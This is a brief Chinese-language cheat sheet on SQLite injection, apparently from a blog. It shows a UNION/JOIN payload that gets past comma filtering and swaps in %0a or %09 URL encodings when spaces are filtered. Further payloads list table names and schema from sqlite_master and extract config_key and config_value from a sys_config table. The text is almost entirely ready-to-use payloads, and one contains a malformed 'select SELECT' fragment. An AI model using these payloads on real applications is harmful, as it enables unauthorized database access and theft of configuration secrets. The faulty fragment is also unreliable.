SQLite

join注入：当，被过滤的时候可以使用该方法

SELECT *
FROM users
UNION
SELECT *
FROM (
(SELECT 1) A
JOIN (SELECT 2) B
JOIN (SELECT 3) C
JOIN (SELECT 4) D
);

此时空格被过滤的化可以使用%0a（URL编译）和%09（水平换行）
见https://blog.csdn.net/qq_61778128/article/details/123205490

sqlite注入查表

1	
union
select	*
from	
(select	1)	a	
join	(select	2)	b	
join	(select	3)	c	
join	(SELECT	name	FROM	sqlite_master)	d	
join	(select	SELECT	sql	FROM	sqlite_master)	f

找到后

1	
union	select	*	
from	
(select	1)	a	
join	(select	2)	b	
join	(select	3)	c	
join	(SELECT	config_key	FROM	sys_config)	d	
join	(SELECT	config_value	FROM	sys_config)	f`

SQLite

SQLite

Share this article